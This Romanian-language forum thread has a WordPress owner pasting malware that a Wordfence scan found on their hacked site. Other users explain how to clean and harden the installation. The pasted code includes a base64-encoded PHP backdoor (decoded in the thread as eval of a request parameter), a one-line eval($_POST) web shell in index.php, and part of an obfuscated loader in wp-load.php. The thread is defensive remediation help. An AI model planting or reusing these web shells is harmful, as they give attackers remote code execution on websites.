Titlul website-ului este afisat cu caractere chinezesti pe Google

Il ai setat pe UTF-16. Titlul site.ului.

LE pune.l pe UTF-8

Edited by Travertin, 09 March 2017 - 22:09.

Folosind plugin Wordfence recomandat in articolul de mai sus, am scanat site-ul si a gasit cateva fisiere suspicioase..
Unul dintre ele, wp-admin/includes/rnnvhs.php, contine aceste linii de cod:

<?php
$VIFJA='aWYoaXNzZXQoJF9SRVFVRVNUWydjb2NvJ10pICYmICRfUkVRVUVTVFsnY29jbyddIT0nJyl7ZXZhbCgkX1JFUVVFU1RbJ2NvY28nXSk7ZXhpdCgpO30=';
eval(base64_decode($VIFJA));
exit();
?>

In index.php, a detectat chiar in prima linie de cod:

<?php @eval($_POST['dd']);?><?php

In wp-load.php a gasit:

<?php
//header('Content-Type:text/html; charset=utf-8');
$O_0O0OO_0_='1148';
$O000__O_OO=10474;
$O_0OO0_O_0='/kindly/slither/C-1-A-B-progenitor-switchyard.doc';
$OO00O___O0='repellent,infinite,jeer,moonlit,repeat,eggplant,mismatch,capitation,portable,intake,sectarian,pictograph,fighting,verge,interactive,swindle,erasure,prognathous,glorify,protectionism';
$O0O0O_O0__='';
$O0O_0_OO_0=0;
$O_O_00_O0O='';
$OO_0_O0_0O='0';
$O0O_O00O__='1';
$O0O___00OO='1';
$O0OO_O0__0='1';
$OOO0O0_0__='0';
$OO_O_0_0O0='1';
$O0_O_O00_O='n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j';$O_O_O00_O0=$O0_O_O00_O{26}.$O0_O_O00_O{6}.$O0_O_O00_O{10}.$O0_O_O00_O{30}.$O0_O_O00_O{29}.$O0_O_O00_O{26}.$O0_O_O00_O{30}.$O0_O_O00_O{38}.$O0_O_O00_O{6}.$O0_O_O00_O{18}.$O0_O_O00_O{23}.$O0_O_O00_O{10}.$O0_O_O00_O{29}.$O0_O_O00_O{10}.$O0_O_O00_O{12}.$O0_O_O00_O{5}.$O0_O_O00_O{30}.$O0_O_O00_O{2}.$O0_O_O00_O{35}.$O0_O_O00_O{0}.$O0_O_O00_O{30}.$O0_O_O00_O{29}.$O0_O_O00_O{33}.$O0_O_O00_O{30}.$O0_O_O00_O{10};$O0_O_OO_00=$O0_O_O00_O{16}.{"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x30\x4f\x4f\x5f"]();?>
<?php (codul a fost scurtat ca era foarte lung; ideea conta)

Pur si simplu sterg aceste fisiere / linii de cod sau este de ajuns sa pun peste kit-ul original de instalat wordpress?

Travertin, on 09 martie 2017 - 22:05, said:

Zi-mi te rog cum fac asta.

Multumesc frumos!

Edited by LordRevan, 09 March 2017 - 22:15.

Cand am prins la cineva o chestie de genul asta, am facut in felul urmator:
- am sters pe rand folderele wp-admin si wp-includes;
- in locul lor am pus folderele din arhiva cu ultima versiune de WP;
- am sters apoi fisierele din root in afara de .htaccess, wp-config.php si alte fisiere puse de mine acolo(gen robots.txt) si am pus cele din root din arhiva platformei;
- in wp-content am luat fiecare folder in parte si am verificat sa fie ceva fisier suspect, inclusiv in uploads am gasit fisiere virusate.
In felul asta scapi si de fisierele incarcate de hackeri/programele malitioase, nu doar de fisierele modificate.

De asta te-am intrebat daca esti la zi cu ultima versiune de WP... ca uneori injecteaza cod si in platforma.

P.S. Tine Wordfence activ in continuare, macar sa te notifice pe mail cand mai gaseste ceva + ca are firewall integrat si te apara de unele atacuri.

Edited by tigerheart, 09 March 2017 - 22:32.

In wp-config.php trebuie sa arate asa:

//define('DB_CHARSET', 'utf8');
//define('DB_COLLATE', '');

LE fisierul este in directorul radacina. Il copiezi in pc cu FTP sau File Manager din cPanel.
Il modifici daca nu are asa cele 2 linii si il copiezi la loc in site.


Dupa COLLATE e o ghilimea, o virgula si sunt doua ghilimele simple.

Edited by Travertin, 09 March 2017 - 22:38.

tigerheart, on 09 martie 2017 - 22:30, said:

Am verificat si fisierele din tema cu metoda recomandata de tine si am gasit si in ea coduri suspecte, ma refer in fisierele originale, descarcate de pe envato market.

Daca in loc de cum ai spus tu, fac cum am fost sfatuit si mai sus, adica reinstalare wordpress plus pluginuri, nu pierd setarile de pluginurior? Cel mai mult ma doare de woocommerce.

In wp-config.php, am gasit aceste linii de cod:

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4'); -> doar inlocuiesc utf8mb4 cu UFT-8?
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

Totodata, am mai gasit si aceste linii de cod care mie imi par a fi malitioase:

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpres...t-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'w(yEyWOE0F1H?TJ=^4@JJIcRT1+kbao=aUQd2C22xjxrTwW,`P#JX5f^d=;+vM[K');
define('SECURE_AUTH_KEY',  'hZOa>p(BodS)#k_uG`UJu]&UB1|cq#SQvC>j7F~m]N)q|9i<D]3lHgMQhT,Dm$RH');
define('LOGGED_IN_KEY',    ']jVMVqg<73akd65Arq.7EzNaA)e;(hFvw]aH!qk[B~Dc?a+yodmHLb5f<NVI0Vc ');
define('NONCE_KEY',     '(7R7^,E)z?vDIG;_j;oGa*dnve8xA3zjoEzj9^6)t-(%E7u/ [email protected]!tLuI');
define('AUTH_SALT',     'nsJa6bzk++XdW+:or7q2;FkW,#B;G+~~j _yO5~pP&-#<Bo<aG8V)nX|+`>[{&he');
define('SECURE_AUTH_SALT', 'hL,=<nmLl^Q1:_|j).z7O]$Xbms;idzjw!NP`,%j)Zrpdd3Rrj2(&pDvhlv^`yU4');
define('LOGGED_IN_SALT',   'YW_5+_ih5;]6?7,1LO[jPIsA3v{uNN,SA-K(ocMs&$YC0ehAVtG*R<zk]SZDo$9o');
define('NONCE_SALT',    '1qz`Ov`1hJ#H)OGZ!>c(}Iuy]JmknWz#:bw`&%%*0Ga_;B>=<RH,{mY&WpToCOOM');
/**#@-*/

utf8mb4 cu utf8

Daca si in tema ai gasit acel eval....vezi si tu aici daca e de la tema sau nu.

https://perishablepr.../tools/decoder/

Cel postat aici, deocdat e cam asa

z��m��^r�^if(isset($_REQUEST['coco']) && $_REQUEST['coco']!=''){eval($_REQUEST['coco']);exit();}

PS. Si daca ai back-up urci tot curat.
Woocommerce urca parca pozele tot in uploads

PS2. Asta e usor, sa vezi ce frumos este cand e ceva in baza de date...si tre s-o refaci manual

LE. Aa...si sa-ti pui modulul pentru rename wp-admin (Rename wp-login.php)

Edited by xxvirusxx, 10 March 2017 - 00:36.

Travertin, on 10 martie 2017 - 00:17, said:

Dupa ce inlocuiesc, ce fac? Dau un fetch din Google Search Console?

xxvirusxx, on 10 martie 2017 - 00:23, said:

Back-up-ul este facut la tot folderul public_html unde este instalat si wordpress. Daca pun la loc wordpress peste ce este acum, iar apoi urc la loc ce era in back-up, nu tot acolo ajung?
De asemenea, nu se pierd paginile, categoriile, produsele etc.?

Off...da greu mai intelegi....

Setari, postari, etc etc etc etc etc...sunt in baza de date.

Si daca am zis ca urci "curat", din acel back-up urci doar uploads...pentru pozele produselor postari etc etc

PS. Dar mai bine apeleaza la cineva care se pricepe.

Edited by xxvirusxx, 10 March 2017 - 12:46.

Multumesc pentru rabdare.

Am inteles acum ce trebuie facut: reinstalez wordpress-ul, iar din ce era inainte, urc doar folder-ul uploads. Va ramane corespondenta poza - produs sau trebuie refacuta?
Plugin-urile le sterg din panoul de admin sau este nevoie sa le sterg si maual prin FTP?

Citisem pe un site ca nu este asa bine sa schimbi URL-ul de logare (wp-admin si wp-login) pentru ca pot aparea probleme de functionalitate si se pot da peste cap link-urile, plus ca nu confera o asa mare protectie.

Din cate vad, te descurci destul de greu. Avand in vedere ca am mai trecut prin asta si am rezolvat eu problema clientului meu, te pot ajuta contra-cost daca nu reusesti. Contacteaza-ma pe privat si cu TeamViewer ne uitam sa vedem ce se poate face.

LordRevan, uite aici pas cu pas ce trebuie facut... Inainte sa incepi: back-up la site + baza de date.

0. Blochezi accesul la site pana termini pasul 1 si 2:
- deschizi .htaccess si pui urmatorul cod pe ultima linie:

Deny from all

- dupa ce ai terminat pasul 1 si 2, stergi codul respectiv.

1. Inlocuirea fisierelor core WP:
- stergi /wp-admin, /wp-includes si fisierele din root in afara de .htaccess, wp-config, robots.txt si alte fisierele pe care le-ai pus;
- verifici fisierele din root ramase daca au un cod malitios;
- descarci WP - https://ro.wordpress...4.7.3-ro_RO.zip - si incarci pe site fisierele si folderele din arhiva;

2. Dezinfectarea /wp-content:
- intri in /languages si verifici sa nu fie un fisier .php cu un cod malitios;
- /plugins: iei fiecare plugin la rand, descarci in calculator fiecare plugin dintr-o sursa sigura(https://ro.wordpress.org/plugins/ sau de unde le-ai luat initial) si te asiguri ca versiunea instalata pe site e si versiunea descarcata in calculator. Pui toate pluginurile astea intr-un folder ca sa iti fie mai usor. Stergi apoi via ftp toate pluginurile de pe site si apoi incarci pluginurile din calculator.
- /themes: faci la fel ca la /plugins, descarci versiunea temei instalate dintr-o sursa sigura, sterge tema de pe site si inlocuiesti cu cea din calculator. DACA tema a fost modificata atunci iei frumusel fiecare fisier din tema si verifici sa nu aiba cod malitios. Orice alta tema din /themes o stergi.
- /upgrade: verifici sa nu aiba fisiere .php cu un cod malitios;
- /uploads: verifici sa nu fie nici un fisier .php cu un cod malitios. Daca gasesti, stergi.

3. Instalezi Sucuri - https://ro.wordpress...sucuri-scanner/
- intri apoi in plugin, la Hardening si activezi tot de acolo(Hardening Options) in afara de Website Firewall protection;
- intri la Post hack => Security keys si bifezi casuta de jos si dai click pe Generate....
- dezactivezi si stergi pluginul.

4. Activezi si configurezi Wordfence(activezi firewal, protectia de logare, etc.).

5. Schimbi parola la toti utilizatorii.

Asta ar trebui sa fie de ajuns ca sa rezolve problema, fara sa dai vreun ban.

Edited by tigerheart, 10 March 2017 - 14:03.

@Kain_12: Multumesc.
Voi incerca sa fac de unul singur si daca nu voi avea succes, te anunt prin pm.

@tigerheart: Multumesc mult pentru ghidul realizat.

Simpla stergere a codului malitios este suficienta? Intreb asta si pentru ca in fisisrele descarcate direct de unde am achizitionat tema apar cateva linii de cod malitioase (contin un sir de carcactere aleator)
Te referi sa sterg toate temele, inclusiv cele implicite ale wordpress-ului?

In cele mai multe din cazuri doar sunt injectate in fisierele site-ului niste coduri de legatura catre niste fisiere incarcate de catre bot/hacker si alea fac mai departe treaba. Deci da, eliminarea codului si a fisierelor ce nu au legatura cu site-ul ar fi suficient. Sunt si cazuri in care sunt accesate si datele din baza de date, dar nu cred ca aici a fost asa.
Lasa pe site doar tema pe care o folosesti, cam la fel ar fi recomandat si in cazul pluginurilor. Ce nu se foloseste nu prea are rost sa fie lasat pe site chiar daca e dezactivat.

Incarca aici sau trimite-mi un mesaj cu acel fisier de care zici ca are cateva linii de cod suspect.

LordRevan, on 10 martie 2017 - 13:15, said:

lol....

1. Intri pe FTP...f...i un delete la tot, in afara de: uploads,wp-config.php,.htaccess
2. Descarci de pe Wordpress, arhiva cu aceasta, dezarhivata, apoi o urci pe FTP.
3. Descarci modulele,tema curate, si le urci pe FTP.
4. Verifici site-ul, daca-i lipseste vreo poza (daca lipseste vreo poza), o urci din back-up pe FTP.

Edited by xxvirusxx, 10 March 2017 - 15:20.

tigerheart, on 10 martie 2017 - 15:07, said:

La lnia 84 apare o secventa de caractere aleatorii. Este direct descarcata de pe envato market.

@xxvirusxx: Mersi!

Daca ai redescarcat-o de pe envato,a tunci tema e curata.

Kain_12, on 10 martie 2017 - 13:35, said:

Eu il ajut moca.

LordRevan, on 10 martie 2017 - 15:23, said:

Aia e o imagine codata in base64, e curat codul.
Intra pe http://freeonlinetoo...om/base64-image, introdu-l acolo si vei vedea ca e o imagine:
[ https://s29.postimg.org/oykf776t3/screenshot_13.png - Pentru incarcare in pagina (embed) Click aici ]

Edited by tigerheart, 10 March 2017 - 15:36.